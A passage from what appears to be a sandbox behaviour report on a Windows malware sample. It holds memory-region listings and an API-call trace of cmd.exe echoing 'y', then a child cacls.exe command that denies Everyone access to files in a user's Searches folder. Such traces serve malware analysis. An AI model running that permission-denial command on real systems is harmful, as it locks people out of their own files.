"\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 642 start_va = 0x74a60000 end_va = 0x74ab2fff entry_point = 0x74a60000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 643 start_va = 0x74ac0000 end_va = 0x74ac8fff entry_point = 0x74ac0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 644 start_va = 0x74ad0000 end_va = 0x74aecfff entry_point = 0x74ad0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 645 start_va = 0x74d10000 end_va = 0x74d87fff entry_point = 0x74d10000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 646 start_va = 0x74e20000 end_va = 0x74ed0fff entry_point = 0x74e20000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 647 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 648 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 649 start_va = 0x75a10000 end_va = 0x75a4dfff entry_point = 0x75a10000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 650 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 651 start_va = 0x7f670000 end_va = 0x7f76ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f670000" filename = "" Thread: id = 15 os_tid = 0xb74 Process: id = "14" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x11b31000" os_pid = "0xb78" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa5c" cmd_line = "C:\\Windows\\system32\\cmd.exe /S /D /c\" echo y\"" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 652 start_va = 0xd30000 end_va = 0xd4ffff entry_point = 0x0 region_type = private name = "private_0x0000000000d30000" filename = "" Region: id = 653 start_va = 0xd50000 end_va = 0xd51fff entry_point = 0x0 region_type = private name = "private_0x0000000000d50000" filename = "" Region: id = 654 start_va = 0xd60000 end_va = 0xd6efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d60000" filename = "" Region: id = 655 start_va = 0xd70000 end_va = 0xdaffff entry_point = 0x0 region_type = private name = "private_0x0000000000d70000" filename = "" Region: id = 656 start_va = 0xdb0000 end_va = 0xeaffff entry_point = 0x0 region_type = private name = "private_0x0000000000db0000" filename = "" Region: id = 657 start_va = 0xeb0000 end_va = 0xeb3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000eb0000" filename = "" Region: id = 658 start_va = 0xec0000 end_va = 0xec0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ec0000" filename = "" Region: id = 659 start_va = 0xed0000 end_va = 0xed1fff entry_point = 0x0 region_type = private name = "private_0x0000000000ed0000" filename = "" Region: id = 660 start_va = 0x1290000 end_va = 0x12defff entry_point = 0x1290000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 661 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 662 start_va = 0x7f160000 end_va = 0x7f182fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f160000" filename = "" Region: id = 663 start_va = 0x7f188000 end_va = 0x7f18afff entry_point = 0x0 region_type = private name = "private_0x000000007f188000" filename = "" Region: id = 664 start_va = 0x7f18b000 end_va = 0x7f18bfff entry_point = 0x0 region_type = private name = "private_0x000000007f18b000" filename = "" Region: id = 665 start_va = 0x7f18d000 end_va = 0x7f18dfff entry_point = 0x0 region_type = private name = "private_0x000000007f18d000" filename = "" Region: id = 666 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 667 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 668 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 669 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 670 start_va = 0xf20000 end_va = 0xf2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f20000" filename = "" Region: id = 671 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 672 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 673 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 692 start_va = 0xd30000 end_va = 0xd3ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d30000" filename = "" Region: id = 693 start_va = 0xf30000 end_va = 0xfadfff entry_point = 0xf30000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 694 start_va = 0x1060000 end_va = 0x115ffff entry_point = 0x0 region_type = private name = "private_0x0000000001060000" filename = "" Region: id = 695 start_va = 0x1220000 end_va = 0x122ffff entry_point = 0x0 region_type = private name = "private_0x0000000001220000" filename = "" Region: id = 696 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 697 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 698 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 699 start_va = 0x7f060000 end_va = 0x7f15ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f060000" filename = "" Region: id = 700 start_va = 0xd40000 end_va = 0xd43fff entry_point = 0x0 region_type = private name = "private_0x0000000000d40000" filename = "" Thread: id = 16 os_tid = 0xb7c [0035.916] GetModuleHandleA (lpModuleName=0x0) returned 0x1290000 [0035.916] __set_app_type (_Type=0x1) [0035.916] __p__fmode () returned 0x76ea1768 [0035.916] __p__commode () returned 0x76ea176c [0035.916] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x12a89b1) returned 0x0 [0035.916] __getmainargs (in: _Argc=0x12b51d8, _Argv=0x12b51dc, _Env=0x12b51e0, _DoWildCard=0, _StartInfo=0x12b507c | out: _Argc=0x12b51d8, _Argv=0x12b51dc, _Env=0x12b51e0) returned 0 [0035.916] GetCurrentThreadId () returned 0xb7c [0035.916] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb7c) returned 0x30 [0035.916] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f70000 [0035.916] GetProcAddress (hModule=0x74f70000, lpProcName="SetThreadUILanguage") returned 0x74fb3daf [0035.917] SetThreadUILanguage (LangId=0x0) returned 0x409 [0035.918] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0035.918] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0xeaf778 | out: phkResult=0xeaf778*=0x0) returned 0x2 [0035.918] VirtualQuery (in: lpAddress=0xeaf787, lpBuffer=0xeaf720, dwLength=0x1c | out: lpBuffer=0xeaf720*(BaseAddress=0xeaf000, AllocationBase=0xdb0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0035.918] VirtualQuery (in: lpAddress=0xdb0000, lpBuffer=0xeaf720, dwLength=0x1c | out: lpBuffer=0xeaf720*(BaseAddress=0xdb0000, AllocationBase=0xdb0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0035.918] VirtualQuery (in: lpAddress=0xdb1000, lpBuffer=0xeaf720, dwLength=0x1c | out: lpBuffer=0xeaf720*(BaseAddress=0xdb1000, AllocationBase=0xdb0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0035.918] VirtualQuery (in: lpAddress=0xdb3000, lpBuffer=0xeaf720, dwLength=0x1c | out: lpBuffer=0xeaf720*(BaseAddress=0xdb3000, AllocationBase=0xdb0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0035.919] VirtualQuery (in: lpAddress=0xeb0000, lpBuffer=0xeaf720, dwLength=0x1c | out: lpBuffer=0xeaf720*(BaseAddress=0xeb0000, AllocationBase=0xeb0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0035.919] GetConsoleOutputCP () returned 0x1b5 [0035.919] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0035.919] SetConsoleCtrlHandler (HandlerRoutine=0x12b1877, Add=1) returned 1 [0035.919] _get_osfhandle (_FileHandle=1) returned 0x28 [0035.919] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x0) returned 0 [0035.919] _get_osfhandle (_FileHandle=1) returned 0x28 [0035.919] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 0 [0035.919] _get_osfhandle (_FileHandle=0) returned 0x24 [0035.919] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0035.919] GetEnvironmentStringsW () returned 0x1064058* [0035.919] FreeEnvironmentStringsA (penv="=") returned 1 [0035.919] GetEnvironmentStringsW () returned 0x1064058* [0035.919] FreeEnvironmentStringsA (penv="=") returned 1 [0035.919] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0xeae6c8 | out: phkResult=0xeae6c8*=0x40) returned 0x0 [0035.920] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0xeae6d0, lpData=0xeae6d4, lpcbData=0xeae6cc*=0x1000 | out: lpType=0xeae6d0*=0x0, lpData=0xeae6d4*=0x2c, lpcbData=0xeae6cc*=0x1000) returned 0x2 [0035.920] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0xeae6d0, lpData=0xeae6d4, lpcbData=0xeae6cc*=0x1000 | out: lpType=0xeae6d0*=0x4, lpData=0xeae6d4*=0x1, lpcbData=0xeae6cc*=0x4) returned 0x0 [0035.920] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0xeae6d0, lpData=0xeae6d4, lpcbData=0xeae6cc*=0x1000 | out: lpType=0xeae6d0*=0x0, lpData=0xeae6d4*=0x1, lpcbData=0xeae6cc*=0x1000) returned 0x2 [0035.920] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0xeae6d0, lpData=0xeae6d4, lpcbData=0xeae6cc*=0x1000 | out: lpType=0xeae6d0*=0x4, lpData=0xeae6d4*=0x0, lpcbData=0xeae6cc*=0x4) returned 0x0 [0035.920] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0xeae6d0, lpData=0xeae6d4, lpcbData=0xeae6cc*=0x1000 | out: lpType=0xeae6d0*=0x4, lpData=0xeae6d4*=0x40, lpcbData=0xeae6cc*=0x4) returned 0x0 [0035.920] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0xeae6d0, lpData=0xeae6d4, lpcbData=0xeae6cc*=0x1000 | out: lpType=0xeae6d0*=0x4, lpData=0xeae6d4*=0x40, lpcbData=0xeae6cc*=0x4) returned 0x0 [0035.920] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0xeae6d0, lpData=0xeae6d4, lpcbData=0xeae6cc*=0x1000 | out: lpType=0xeae6d0*=0x0, lpData=0xeae6d4*=0x40, lpcbData=0xeae6cc*=0x1000) returned 0x2 [0035.920] RegCloseKey (hKey=0x40) returned 0x0 [0035.920] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0xeae6c8 | out: phkResult=0xeae6c8*=0x40) returned 0x0 [0035.920] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0xeae6d0, lpData=0xeae6d4, lpcbData=0xeae6cc*=0x1000 | out: lpType=0xeae6d0*=0x0, lpData=0xeae6d4*=0x40, lpcbData=0xeae6cc*=0x1000) returned 0x2 [0035.920] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0xeae6d0, lpData=0xeae6d4, lpcbData=0xeae6cc*=0x1000 | out: lpType=0xeae6d0*=0x4, lpData=0xeae6d4*=0x1, lpcbData=0xeae6cc*=0x4) returned 0x0 [0035.920] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0xeae6d0, lpData=0xeae6d4, lpcbData=0xeae6cc*=0x1000 | out: lpType=0xeae6d0*=0x0, lpData=0xeae6d4*=0x1, lpcbData=0xeae6cc*=0x1000) returned 0x2 [0035.920] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0xeae6d0, lpData=0xeae6d4, lpcbData=0xeae6cc*=0x1000 | out: lpType=0xeae6d0*=0x4, lpData=0xeae6d4*=0x0, lpcbData=0xeae6cc*=0x4) returned 0x0 [0035.920] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0xeae6d0, lpData=0xeae6d4, lpcbData=0xeae6cc*=0x1000 | out: lpType=0xeae6d0*=0x4, lpData=0xeae6d4*=0x9, lpcbData=0xeae6cc*=0x4) returned 0x0 [0035.920] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0xeae6d0, lpData=0xeae6d4, lpcbData=0xeae6cc*=0x1000 | out: lpType=0xeae6d0*=0x4, lpData=0xeae6d4*=0x9, lpcbData=0xeae6cc*=0x4) returned 0x0 [0035.920] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0xeae6d0, lpData=0xeae6d4, lpcbData=0xeae6cc*=0x1000 | out: lpType=0xeae6d0*=0x0, lpData=0xeae6d4*=0x9, lpcbData=0xeae6cc*=0x1000) returned 0x2 [0035.920] RegCloseKey (hKey=0x40) returned 0x0 [0035.920] time (in: timer=0x0 | out: timer=0x0) returned 0x5aa5004f [0035.920] srand (_Seed=0x5aa5004f) [0035.920] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /S /D /c\" echo y\"" [0035.920] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /S /D /c\" echo y\"" [0035.920] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12b5a20 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0035.920] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1064060, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0035.920] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0035.920] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0035.920] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0035.920] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0035.921] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0035.921] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0035.921] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0035.921] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0035.921] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0035.921] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0035.921] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0035.921] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0035.921] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0035.921] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xeaf4a8 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0035.921] GetFullPathNameW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop", nBufferLength=0x104, lpBuffer=0xeaf4a8, lpFilePart=0xeaf4a4 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xeaf4a4*="Desktop") returned 0x1c [0035.921] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 0x11 [0035.921] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xeaf220 | out: lpFindFileData=0xeaf220) returned 0x1064270 [0035.921] FindClose (in: hFindFile=0x1064270 | out: hFindFile=0x1064270) returned 1 [0035.921] FindFirstFileW (in: lpFileName="C:\\Users\\5JgHKoaOfdp", lpFindFileData=0xeaf220 | out: lpFindFileData=0xeaf220) returned 0x1064270 [0035.921] FindClose (in: hFindFile=0x1064270 | out: hFindFile=0x1064270) returned 1 [0035.921] _wcsnicmp (_String1="5JGHKO~1", _String2="5JgHKoaOfdp", _MaxCount=0xb) returned 29 [0035.921] FindFirstFileW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFindFileData=0xeaf220 | out: lpFindFileData=0xeaf220) returned 0x1064270 [0035.921] FindClose (in: hFindFile=0x1064270 | out: hFindFile=0x1064270) returned 1 [0035.921] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 0x11 [0035.921] SetCurrentDirectoryW (lpPathName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 1 [0035.922] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 1 [0035.922] GetEnvironmentStringsW () returned 0x10660b0* [0035.922] FreeEnvironmentStringsA (penv="=") returned 1 [0035.922] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12b5a20 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0035.922] GetConsoleOutputCP () returned 0x1b5 [0035.922] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0035.922] GetUserDefaultLCID () returned 0x409 [0035.923] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x12b5560, cchData=8 | out: lpLCData=":") returned 2 [0035.923] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0xeaf5d4, cchData=128 | out: lpLCData="0") returned 2 [0035.923] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0xeaf5d4, cchData=128 | out: lpLCData="0") returned 2 [0035.923] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0xeaf5d4, cchData=128 | out: lpLCData="1") returned 2 [0035.923] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x12b5570, cchData=8 | out: lpLCData="/") returned 2 [0035.923] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x12b5660, cchData=32 | out: lpLCData="Mon") returned 4 [0035.923] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x12b56a0, cchData=32 | out: lpLCData="Tue") returned 4 [0035.923] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x12b56e0, cchData=32 | out: lpLCData="Wed") returned 4 [0035.923] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x12b5720, cchData=32 | out: lpLCData="Thu") returned 4 [0035.923] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x12b5760, cchData=32 | out: lpLCData="Fri") returned 4 [0035.923] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x12b57a0, cchData=32 | out: lpLCData="Sat") returned 4 [0035.923] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x12b57e0, cchData=32 | out: lpLCData="Sun") returned 4 [0035.923] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x12b5580, cchData=8 | out: lpLCData=".") returned 2 [0035.923] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x12b5590, cchData=8 | out: lpLCData=",") returned 2 [0035.923] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0035.924] GetConsoleTitleW (in: lpConsoleTitle=0x1064d78, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0035.924] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f70000 [0035.924] GetProcAddress (hModule=0x74f70000, lpProcName="CopyFileExW") returned 0x74f95d45 [0035.924] GetProcAddress (hModule=0x74f70000, lpProcName="IsDebuggerPresent") returned 0x74f8d16f [0035.924] GetProcAddress (hModule=0x74f70000, lpProcName="SetConsoleInputExeNameW") returned 0x759cdda0 [0035.925] _wcsicmp (_String1="echo", _String2=")") returned 60 [0035.925] _wcsicmp (_String1="FOR", _String2="echo") returned 1 [0035.925] _wcsicmp (_String1="FOR/?", _String2="echo") returned 1 [0035.925] _wcsicmp (_String1="IF", _String2="echo") returned 4 [0035.925] _wcsicmp (_String1="IF/?", _String2="echo") returned 4 [0035.925] _wcsicmp (_String1="REM", _String2="echo") returned 13 [0035.925] _wcsicmp (_String1="REM/?", _String2="echo") returned 13 [0035.926] GetConsoleTitleW (in: lpConsoleTitle=0xeaf2c8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0035.926] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0035.926] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0035.926] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0035.926] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0035.926] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0035.926] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0035.926] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0035.926] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0035.926] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0035.926] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0035.927] _vsnwprintf (in: _Buffer=0x12c8840, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0xeaf284 | out: _Buffer="y\r\n") returned 3 [0035.927] _get_osfhandle (_FileHandle=1) returned 0x28 [0035.927] GetFileType (hFile=0x28) returned 0x3 [0035.927] _get_osfhandle (_FileHandle=1) returned 0x28 [0035.927] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="y\r\n", cchWideChar=-1, lpMultiByteStr=0x12b6840, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\r\n", lpUsedDefaultChar=0x0) returned 4 [0035.927] WriteFile (in: hFile=0x28, lpBuffer=0x12b6840*, nNumberOfBytesToWrite=0x3, lpNumberOfBytesWritten=0xeaf274, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesWritten=0xeaf274*=0x3, lpOverlapped=0x0) returned 1 [0035.927] _get_osfhandle (_FileHandle=1) returned 0x28 [0035.927] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x0) returned 0 [0035.927] _get_osfhandle (_FileHandle=1) returned 0x28 [0035.927] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 0 [0035.927] _get_osfhandle (_FileHandle=0) returned 0x24 [0035.927] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0035.927] SetConsoleInputExeNameW () returned 0x1 [0035.927] GetConsoleOutputCP () returned 0x1b5 [0035.928] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0035.928] SetThreadUILanguage (LangId=0x0) returned 0x409 [0035.928] exit (_Code=0) Process: id = "15" image_name = "cacls.exe" filename = "c:\\windows\\syswow64\\cacls.exe" page_root = "0xf77a000" os_pid = "0xb80" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa5c" cmd_line = "cacls \"C:\\Users\\5JgHKoaOfdp\\Searches\\*.*\" /e /d everyone" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 674 start_va = 0x590000 end_va = 0x5affff entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 675 start_va = 0x5b0000 end_va = 0x5b1fff entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 676 start_va = 0x5c0000 end_va = 0x5cefff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 677 start_va 